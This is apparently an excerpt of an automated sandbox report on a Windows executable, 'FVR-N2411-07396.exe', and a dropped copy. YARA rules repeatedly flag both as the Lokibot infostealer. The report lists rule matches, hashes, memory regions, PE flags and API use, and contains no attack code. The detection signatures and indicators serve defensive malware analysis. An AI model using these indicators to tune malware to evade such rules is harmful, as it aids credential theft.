Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki Payload Author: kevoreilly
Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
Source: 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: FVR-N2411-07396.exe PID: 2668, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: ZeJFfrYmOnJKS.exe PID: 1436, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: ZeJFfrYmOnJKS.exe PID: 6400, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Code function: 0_2_0284D63C	0_2_0284D63C
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Code function: 0_2_04FB6CE8	0_2_04FB6CE8
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Code function: 0_2_04FB0040	0_2_04FB0040
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Code function: 0_2_04FB001E	0_2_04FB001E
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Code function: 0_2_04FB6CE1	0_2_04FB6CE1
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Code function: 0_2_0720C6D8	0_2_0720C6D8
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Code function: 0_2_07206E08	0_2_07206E08
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Code function: 0_2_07204EC0	0_2_07204EC0
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Code function: 0_2_07206588	0_2_07206588
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Code function: 0_2_07206598	0_2_07206598
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Code function: 0_2_072052E8	0_2_072052E8
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Code function: 0_2_072052F8	0_2_072052F8
Source: C:\Users\user\Desktop\FVR-N2411-07396.exe	Code function: 0_2_072069D0	0_2_072069D0
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Code function: 8_2_00B4D63C	8_2_00B4D63C
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Code function: 8_2_06E1D708	8_2_06E1D708
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Code function: 8_2_06E1DC28	8_2_06E1DC28
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Code function: 8_2_06E1AA60	8_2_06E1AA60
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Code function: 8_2_06E1D6FB	8_2_06E1D6FB
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Code function: 8_2_06E1A7C8	8_2_06E1A7C8
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Code function: 8_2_06E1A7B8	8_2_06E1A7B8
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Code function: 8_2_06E1DCFE	8_2_06E1DCFE
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Code function: 8_2_06E1DC1B	8_2_06E1DC1B
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Code function: 8_2_06E1AA4F	8_2_06E1AA4F
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Code function: 8_2_0810B990	8_2_0810B990
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Code function: 8_2_081069D0	8_2_081069D0
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Code function: 8_2_081052F8	8_2_081052F8
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Code function: 8_2_081052E8	8_2_081052E8
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Code function: 8_2_08106598	8_2_08106598
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Code function: 8_2_08106E08	8_2_08106E08
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Code function: 8_2_08104EC0	8_2_08104EC0
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Code function: 12_2_0040549C	12_2_0040549C
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Code function: 12_2_004029D4	12_2_004029D4

Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe	Code function: String function: 00405B6F appears 42 times

Source: FVR-N2411-07396.exe, 00000000.00000002.2051846710.0000000000C2E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs FVR-N2411-07396.exe
Source: FVR-N2411-07396.exe, 00000000.00000000.2006719176.0000000000726000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameyRKC.exe4 vs FVR-N2411-07396.exe
Source: FVR-N2411-07396.exe, 00000000.00000002.2072739008.00000000089E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs FVR-N2411-07396.exe
Source: FVR-N2411-07396.exe, 00000000.00000002.2053905676.0000000003BC2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs FVR-N2411-07396.exe
Source: FVR-N2411-07396.exe, 00000000.00000002.2071531160.0000000005540000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs FVR-N2411-07396.exe
Source: FVR-N2411-07396.exe, 00000000.00000002.2053219827.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs FVR-N2411-07396.exe
Source: FVR-N2411-07396.exe	Binary or memory string: OriginalFilenameyRKC.exe4 vs FVR-N2411-07396.exe

Source: FVR-N2411-07396.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.FVR-N2411-07396.exe.3a024c8.5.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: FVR-N2411-07396.exe PID: 2668, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: ZeJFfrYmOnJKS.exe PID: 1436, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: ZeJFfrYmOnJKS.exe PID: 6400, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: FVR-N2411-07396.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: ZeJFfrYmOnJKS.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.FVR-N2411-07396.exe.5540000.6.raw.unpack, kAOj1Y7pfP90kycNNw.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FVR-N2411-07396.exe.2a7de7c.2.raw.unpack, kAOj1Y7pfP90kycNNw.cs	Cryptographic APIs: 'CreateDecryptor'

Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, apDEs3fGTU4OZfKjCi.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, apDEs3fGTU4OZfKjCi.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, CttdtNZs0aZFMns15c.cs	Security API names: _0020.SetAccessControl
Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, CttdtNZs0aZFMns15c.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.FVR-N2411-07396.exe.3c07018.4.raw.unpack, CttdtNZs0aZFMns15c.cs	Security API names: _0020.AddAccessRule
Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, CttdtNZs0aZFMns15c.cs	Security API names: _0020.SetAccessControl
Source: 0.2.FVR-N2411-07396.exe.89e0000.7.raw.unpack, CttdtNZs0aZFMns15c.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
